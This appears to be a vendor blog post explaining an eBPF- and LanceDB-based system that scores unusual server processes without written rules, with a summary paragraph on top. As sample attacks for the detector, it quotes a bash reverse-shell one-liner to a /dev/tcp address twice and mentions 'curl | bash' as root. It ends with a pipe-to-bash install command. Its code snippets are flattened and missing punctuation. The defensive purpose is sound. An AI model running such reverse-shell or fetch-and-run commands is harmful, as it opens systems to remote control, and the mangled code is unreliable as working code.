Detecting unusual processes on your servers without writing a single rule

Here is a factual summary of the article:

The article describes a system for detecting unusual server processes that learns what "normal" behavior looks like automatically, eliminating the need for manually written security rules. It uses eBPF to capture process execution data at the kernel level, converts each event into a vector using feature hashing for similarity comparison, and stores the data in LanceDB to identify deviations from established baselines. The authors argue this approach catches novel attacks and forgotten processes that traditional rule-based tools like Falco or Wazuh would miss.

Most security tooling works by asking you to define what "bad" looks like upfront. Falco gives you YAML rules. OSSEC has signatures. Wazuh has a 5,000-line ruleset that ships with the product and still misses half of what matters in your specific environment. The problem isn't that rules are bad — it's that they can only catch what someone already thought to write a rule for. A novel attack, an unusual deployment pattern, or a rogue process your team introduced six months ago and forgot about will all sail straight through. We wanted something different: a system that learns what "normal" looks like on each server and workload automatically, and flags anything that deviates — without any configuration. Here's how we built it using eBPF and LanceDB. Step 1: Capture everything at the kernel level with eBPF eBPF lets you attach programs to kernel events with minimal overhead. We attach to the sys enter execve tracepoint, which fires every time any process is executed on the machine — before the process even starts running. For each execution we capture: The process name comm and full command line argv The parent process name The UID of the calling process Any active network connections src/dst IP, port This is written in Rust using the Aya framework, which compiles the eBPF kernel program separately and loads it at runtime: tracepoint pub fn gretl execve ctx: TracePointContext - u32 { let filename ptr = unsafe { ctx.read at:: 16 ? } as const u8; let pidtgid = bpf get current pid tgid ; let pid = pidtgid 32 as u32; js let mut event = ExecveEvent { pid, comm: 0u8; 16 , filename: 0u8; 64 , argv1: 0u8; 64 , // ... }; if let Ok comm = bpf get current comm { event.comm = comm; } emit execve &event } The events are written to a ring buffer and consumed by the userspace agent, which batches them and POSTs to the backend every 60 seconds. On kernel ≥ 5.8 with BTF enabled, zero instrumentation is required — no agents inside your containers, no sidecars, no changes to your application code. For servers without eBPF support, the Node.js agent falls back to reading /proc//cmdline and /proc//status directly, tracking new PIDs each interval. You lose the real-time kernel hook but still get the process telemetry. Step 2: Represent each process execution as a vector The raw event — a process name, a cmdline string, a parent process, a port — isn't directly comparable. To measure similarity between executions, we need to turn each event into a fixed-length vector. We use feature hashing: tokenise the event fields, hash each token into a position in a 128-dimensional vector, and accumulate signed contributions. The result is normalised to a unit vector. function featureVector event: ProcessEvent : number { const vec = new Float32Array 128 ; const tokens = event.process name, event.parent process, event.event type, String event.local port , String event.remote port , ...tokenise event.cmdline , // split cmdline into meaningful tokens ; for let i = 0; i < tokens.length; i++ { const t = tokens i .toLowerCase .trim ; if t continue; const idx = hashStr t, i 31 % 128; const sign = hashStr t, i 31 + 1 & 1 ? 1 : -1; vec idx += sign; } // L2 normalise so cosine distance is well-defined let norm = 0; for let i = 0; i < 128; i++ norm += vec i vec i ; norm = Math.sqrt norm || 1; return Array.from vec .map v = v / norm ; } Feature hashing is deterministic, requires no external model, adds no latency, and works well for this kind of structured-text input. A bash -i & /dev/tcp/... command and a normal bash --login invocation will land in very different regions of the vector space. Why not use a neural embedding model? We looked at this seriously. Models like all-MiniLM-L6-v2 22 MB, 384 dims or OpenAI's text-embedding-3-small would give richer semantic similarity — they know that sh and bash are both shells, that /tmp and /dev/shm are both writable scratch paths. The problem is the operational cost at ingestion time. The agent reports process events roughly every 60 seconds per server. For a fleet of 50 servers that's ~3,000 events per hour, each needing an embedding call before it can be scored and stored. The options were: Local model on the backend — works, but adds a cold-start dependency, ~200 MB of model weights on disk, and 5–20 ms of CPU per event. On a small Fly.io instance shared with the API server, that's noticeable. External API e.g. OpenAI — adds network latency to every ingest request, a per-token cost that scales with fleet size, and a hard external dependency that can take your security pipeline down. Feature hashing — runs in <0.1 ms, zero dependencies, no network calls, fully deterministic. The same input always produces the same vector, which also makes testing straightforward. For this specific input — structured fields like process names, parent pids, cmdline tokens — feature hashing performs surprisingly well. bash -i & /dev/tcp/10.0.0.1/4444 0 &1 and bash --login land in very different regions of the vector space because their token sets barely overlap. That's all we need for anomaly scoring. The embedding layer is intentionally isolated behind a single featureVector function. Swapping it for a neural model later is a one-function change — the scoring logic, the LanceDB tables, and the API surface don't care what's inside it. Step 3: Store and query with LanceDB LanceDB is an embedded vector database — it runs inside your process, stores data on disk, and supports fast approximate nearest-neighbour search with no separate infrastructure required. We create one LanceDB table per org id, workload pair. Each row stores the 128-dim vector and a timestamp. The table grows as new events arrive and old entries are pruned after 7 days. export async function scoreAndLearn org id: string, workload: string, event: ProcessEvent, : Promise { const conn = await db ; const table = await getOrCreateTable conn, tableName org id, workload ; const vec = featureVector event ; // Find k=10 nearest neighbours in this workload's history const results = await table.vectorSearch vec .limit 10 .toArray ; let score = 1.0; // default: completely unseen if results.length 0 { const distances = results.map r = cosineDistance vec, Array.from r.vector ; const minDist = Math.min ...distances ; score = Math.min 1, minDist 2 ; // scale to 0–1 } // Add this event to the baseline for future comparisons table.add { vector: vec, ts: Date.now } ; return score; } The anomaly score is 0 for something we've seen many times before, and 1 for something completely new. It gets stored alongside the event in ClickHouse so you can query, filter, and alert on it. Step 4: Natural language search Once every event is a vector, querying by description becomes trivial. We embed the search query using the same feature-hashing pipeline and run a nearest-neighbour search across all workload tables. // In the dashboard Security tab: // "show me anything that looks like a reverse shell" POST /telemetry/security/search { "query": "reverse shell bash outbound connection" } This returns the events whose vectors are closest to the query vector — semantically similar behaviour, not keyword matches. A process running bash -i & /dev/tcp/10.0.0.1/4444 0 &1 will score highly even if it doesn't contain the literal words "reverse shell". What it looks like in practice After running on a production server for a few days, the baseline learns what "normal" looks like: your web server process, your cron jobs, your deployment scripts. Then: A developer accidentally leaves a debug shell running → anomaly score 0.85, flagged as warn Your CI/CD pipeline runs a new build script for the first time → score 0.72 on first run, drops to 0.1 after the second run Someone runs curl | bash as root → score 0.94, flagged immediately Your usual nginx worker restarts → score 0.02, ignored No rules were written for any of these. The system learned the baseline automatically and the deviations surfaced on their own. The architecture in one diagram Server Backend Storage ────── ─────── ─────── eBPF kernel ──execve──▶ /otlp/v1/events │ /proc fallback ──────────▶ │ ▼ featureVector │ ▼ LanceDB per workload ──▶ anomaly score │ ▼ ClickHouse.security events │ ▼ Dashboard + NL search What's next The current embedding is purely structural — it knows that bash and sh are different tokens, but doesn't know they're semantically similar shells. Upgrading to a small neural embedding model something like all-MiniLM-L6-v2 would improve natural language search quality significantly, especially for queries phrased in plain English rather than technical terms. We're also working on per-workload alert thresholds — so a security-sensitive production workload can be configured to alert at score 0.6, while a noisy dev environment uses a higher threshold of 0.85. Try it on your servers The agent installs in one command and starts building a baseline immediately. Works on any Linux server — EC2, GCP, bare metal. eBPF on kernel ≥ 5.8, /proc fallback everywhere else. GR TOKEN=your-token bash < curl -fsSL https://gretl.dev/install-agent.sh https://gretl.dev/install-agent.sh